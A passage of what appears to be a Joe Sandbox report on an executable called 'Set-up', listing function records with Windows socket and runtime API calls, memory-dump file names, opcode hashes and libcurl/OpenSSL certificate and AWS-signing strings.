                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: 435173baef4c5d1bfd3c579f8ba565aa5ba87d3fde8f57840340628a3c70e915
                          • Instruction ID: 7843e15e1b79c52fa459ca5eee43b4d21ed23f438a49c5e92fa0b8b7a02b3d35
                          • Opcode Fuzzy Hash: 435173baef4c5d1bfd3c579f8ba565aa5ba87d3fde8f57840340628a3c70e915
                          • Instruction Fuzzy Hash: 6A0119B4A043048BCB08FF79C4C153BB7E0EF55718F42485EE984CB306EA39D8909B9A
                          APIs
                          • getsockname.WS2_32(?,?,00000080), ref: 000EAFD0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: getsockname
                          • String ID:
                          • API String ID: 3358416759-0
                          • Opcode ID: fe90877000899a403a09f2317139a9fc6814e2241b920008a21cf14bda02112e
                          • Instruction ID: 4bdee84a91b418bdc05422927f939d8fc113211422540f6b6936650a455a45fc
                          • Opcode Fuzzy Hash: fe90877000899a403a09f2317139a9fc6814e2241b920008a21cf14bda02112e
                          • Instruction Fuzzy Hash: 1411B4708087C59AEB268F1DD8027E6B3F4EFD4328F108618E99952150F7325AC58BC2
                          APIs
                          • send.WS2_32(?,?,?,00000000), ref: 000EA97E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: send
                          • String ID:
                          • API String ID: 2809346765-0
                          • Opcode ID: 4ce255b2ba726bcce6f55f63601f0e814d791e932631b65691b0b59a8dc4bb4b
                          • Instruction ID: dc35afed9e2a8498a5c829b6dfc8781716c0c2c8c87ad4b1cbced684b4e09198
                          • Opcode Fuzzy Hash: 4ce255b2ba726bcce6f55f63601f0e814d791e932631b65691b0b59a8dc4bb4b
                          • Instruction Fuzzy Hash: FB018F71B00710AFC7148F15DC45B56BBA5EF84720F068259FA982B362C331BC148B92
                          APIs
                          • socket.WS2_32(?,000EB280,00000000), ref: 000EAF66
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: socket
                          • String ID:
                          • API String ID: 98920635-0
                          • Opcode ID: 16f2b49a735dd0dd67bd839d0416ea87a5f7713bf26046bcb4a06156fe373f0c
                          • Instruction ID: d2b2aecc3a135301310d1f5f2951295f7e875c3685bc45fa751972bb5eb42488
                          • Opcode Fuzzy Hash: 16f2b49a735dd0dd67bd839d0416ea87a5f7713bf26046bcb4a06156fe373f0c
                          • Instruction Fuzzy Hash: 4EE0EDB2A05221AFD6549F58E8449ABF7A9EFC8B21F054A59F85463204C770BC508BE2
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: closesocket
                          • String ID:
                          • API String ID: 2781271927-0
                          • Opcode ID: f2c5ddfe9d46c6b47b121fff4916444e54613e50dada06ad6eaf018332cc42d9
                          • Instruction ID: 30c34351e7a7ea11f8237bdd33bbe6261795bc2636f934ddef5227c46d4f365d
                          • Opcode Fuzzy Hash: f2c5ddfe9d46c6b47b121fff4916444e54613e50dada06ad6eaf018332cc42d9
                          • Instruction Fuzzy Hash: 7DE08C306002009BCE608A15C888A5777AB7FC0310F28CB68E12C8A550CB3AEC42CA01
                          APIs
                          • ioctlsocket.WS2_32(?,8004667E), ref: 000867FB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: ioctlsocket
                          • String ID:
                          • API String ID: 3577187118-0
                          • Opcode ID: d21020c853d065cf4a42e5072562d04012d525f5612080d723f1b09efd64dc99
                          • Instruction ID: e3040332019375ace1a9983a2d77956795377094b01fec727de24350500f9e8c
                          • Opcode Fuzzy Hash: d21020c853d065cf4a42e5072562d04012d525f5612080d723f1b09efd64dc99
                          • Instruction Fuzzy Hash: 61C012F1108200EFC7084B24E849A6F77E9EB48255F01441CB046C2150DF749450CF16
                          APIs
                            • Part of subcall function 000DA440: GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 000DA499
                            • Part of subcall function 000DA440: GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 000DA4FB
                            • Part of subcall function 000DA440: RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 000DAA19
                            • Part of subcall function 000D9B60: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(LOCALDOMAIN,00000000,00000000,?,0000000F,?,000D92A4,?,?,?,?,?,?,?,?,00000000), ref: 000D9B6E
                            • Part of subcall function 000D9B60: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(RES_OPTIONS,?,?,?,?,?,?,?,?,00000000,?,0000000F,000D4860,00000000), ref: 000D9C24
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0000000F), ref: 000D93C3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: AdaptersAddressesgetenv$Openmemcpy
                          • String ID:
                          • API String ID: 1905038125-0
                          • Opcode ID: ccfe7d4f088f17ef5b3554a3026b6bb26ef1623b662225f9694dcc43e9e96c42
                          • Instruction ID: 45ab42b996de21d1d223ae2627f084abc793b905cb67f3147bd4c727aae40954
                          • Opcode Fuzzy Hash: ccfe7d4f088f17ef5b3554a3026b6bb26ef1623b662225f9694dcc43e9e96c42
                          • Instruction Fuzzy Hash: 61510671904342ABD750CF25EC85B6BBBE4BF84304F08052EF84997762E731E964DBA2
                          APIs
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,004F6470,?,?,?,?,?,004F5DF1), ref: 004FB091
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: 489b09de03469392b0205c4527003731dc12c2b5f9ef50005da7f51bec6c7b57
                          • Instruction ID: 90464b1d07458de4817a957b7406a84d5c90a340c69654af160f805831c58053
                          • Opcode Fuzzy Hash: 489b09de03469392b0205c4527003731dc12c2b5f9ef50005da7f51bec6c7b57
                          • Instruction Fuzzy Hash: 90D0A771D043048BC7007F54C8C141B33D8FAA6318F80065DDD841B302D739551487C3
                          APIs
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,001D7254,?,crypto/err/err_local.h,00000039,00000000,?,00040000,?,001D40BB,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001FCBD2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: 9b2d529b623923ec31073cfcd58f29b52b6b121d955570106afc08c25ca55059
                          • Instruction ID: afe384f00caecfb54b6223dffd6588fa4a6d544dc2b8c8c932224c460cc63abd
                          • Opcode Fuzzy Hash: 9b2d529b623923ec31073cfcd58f29b52b6b121d955570106afc08c25ca55059
                          • Instruction Fuzzy Hash: 9DB092BA80540CDBE6169704BA8383A7351FAA0B44B940820F705D00B1DB219C18B982
                          APIs
                          • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,Unknown error), ref: 00096E74
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,000007FF), ref: 00096F8A
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,000007FF), ref: 00097184
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00097263
                          • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 000975B8
                            • Part of subcall function 001EF870: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000800), ref: 001EF8AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: memcpy$memcmpmemsetstrcpystrlen
                          • String ID: Unable to load public key$ Certificate level %d: Public key type %s%s (%d/%d Bits/secBits), signed using %s$ SSL certificate issuer check ok (%s)$ SSL certificate verify ok.$ SSL certificate verify result: %s (%ld), continuing anyway.$ common name: %s (matched)$ expire date: %.*s$ issuer: %s$ start date: %.*s$ subject: %s$ subjectAltName does not match %s %s$ subjectAltName: host "%s" matched cert's "%s"$ subjectAltName: host "%s" matched cert's IP address!$%02x$%02x:$%lx$%s certificate:$%s/%s$/%s$: $<$BIO_new return NULL, OpenSSL error %s$BIO_new_mem_buf NULL, OpenSSL error %s$Cert$Could not find certificate ID in OCSP response$Could not get peer certificate chain$Error computing OCSP ID$Error getting peer certificate$Expire date$Invalid OCSP response$Invalid OCSP response status: %s (%d)$Issuer$No OCSP response received$No error$OCSP response has expired$OCSP response verification failed$OpenSSL$Proxy$Public Key Algorithm$RSA Public Key$Remove session ID again from cache$SSL certificate revocation reason: %s (%d)$SSL certificate status: %s (%d)$SSL certificate verify result: %s (%ld)$SSL: Certificate issuer check failed (%s)$SSL: Unable to open issuer cert (%s)$SSL: Unable to read issuer cert (%s)$SSL: certificate subject name '%s' does not match target hostname '%s'$SSL: could not get X509-issuer name$SSL: could not get peer certificate$SSL: illegal cert name field$SSL: no alternative certificate subject name matches target %s '%s'$SSL: public key does not match pinned public key$SSL: unable to obtain common name from peer certificate$Serial Number$Server$Signature$Signature Algorithm$Start date$Subject$Unknown error$Version$[NONE]$dsa$hostname$ipv4 address$ipv6 address$pqg$pub_key$rsa$unexpected ssl peer type: %d$vtls/openssl.c
                          • API String ID: 838718518-248801092
                          • Opcode ID: 95d9e235aa9d87e41301cac5184a55d194c516b52d37cd712232f5c952b3b819
                          • Instruction ID: ae2501a8db632f6d6feaec4b6f6316e9627030fa099092f68fcc55f9f9e972f1
                          • Opcode Fuzzy Hash: 95d9e235aa9d87e41301cac5184a55d194c516b52d37cd712232f5c952b3b819
                          • Instruction Fuzzy Hash: 6A03E7B69183406BEB20AB10AC42B7F76D8AF96708F08483CFD4D56283F775A954D793
                          APIs
                            • Part of subcall function 003A8870: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 003A88AA
                          • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 0007E8EB
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002E), ref: 0007E907
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0007E96C
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000003A), ref: 0007EA3C
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 0007EA5F
                          • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 0007EC0A
                          • strftime.API-MS-WIN-CRT-TIME-L1-1-0(?,00000011,%Y%m%dT%H%M%SZ,?), ref: 0007ED17
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0007ED37
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0007EE03
                          • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 0007EE24
                          • strcspn.API-MS-WIN-CRT-STRING-L1-1-0(?,005AAED1), ref: 0007EE32
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strlen$strchrstrcpy$__stdio_common_vsscanf_time64memcpystrcspnstrftime
                          • String ID: ;:$%64[^:]:%64[^:]:%64[^:]:%64s$%Y%m%dT%H%M%SZ$%s%s%s%s%s%.*s$%s/%s/%s/%s$%s4%s$%s4-HMAC-SHA256%s%s%s$%s4_request$%s: %s$+$Authorization$Authorization: %s4-HMAC-SHA256 Credential=%s/%s, SignedHeaders=%s, Signature=%s%s%s$Date$Host$X-%s-Date$aws$aws-sigv4: region missing in parameters and hostname$aws-sigv4: region too long in hostname$aws-sigv4: service missing in parameters and hostname$aws-sigv4: service too long in hostname$aws:amz$aws_sigv4: picked region %s from host$aws_sigv4: picked service %s from host$first aws-sigv4 provider cannot be empty$host:%s$http_aws_sigv4.c$x-%s-content-sha256$x-%s-content-sha256: %s$x-%s-date:%s
                          • API String ID: 3777502179-657784405
                          • Opcode ID: d10c5957674038edd7c1381f25cbba0c8299afec7a551ae14f621306f7c3815a
                          • Instruction ID: 49e919862ad16e003acee0496ad33c4131699c7ff4b63df0f64ccd7d27045770
                          • Opcode Fuzzy Hash: d10c5957674038edd7c1381f25cbba0c8299afec7a551ae14f621306f7c3815a
                          • Instruction Fuzzy Hash: 7792C6B1D08381ABE7319B20DC45BBF77D8AB95304F04882DF98D96242FB75A944C7A7
                          APIs
                          • localeconv.MSVCRT ref: 003AE0B3
                          • localeconv.MSVCRT ref: 003AE0BE
                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 003AE149
                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 003AE179
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 003AE1D8
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 003AE1FA
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 003AE20F
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 003AF886
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: free$isspacelocaleconv$_errno
                          • String ID: $d$nil)
                          • API String ID: 577766270-394766432
                          • Opcode ID: bf03f6a68b4dfad5224d2a5048699ab8af2a4461cbabbcc595c5bbfd2236b620
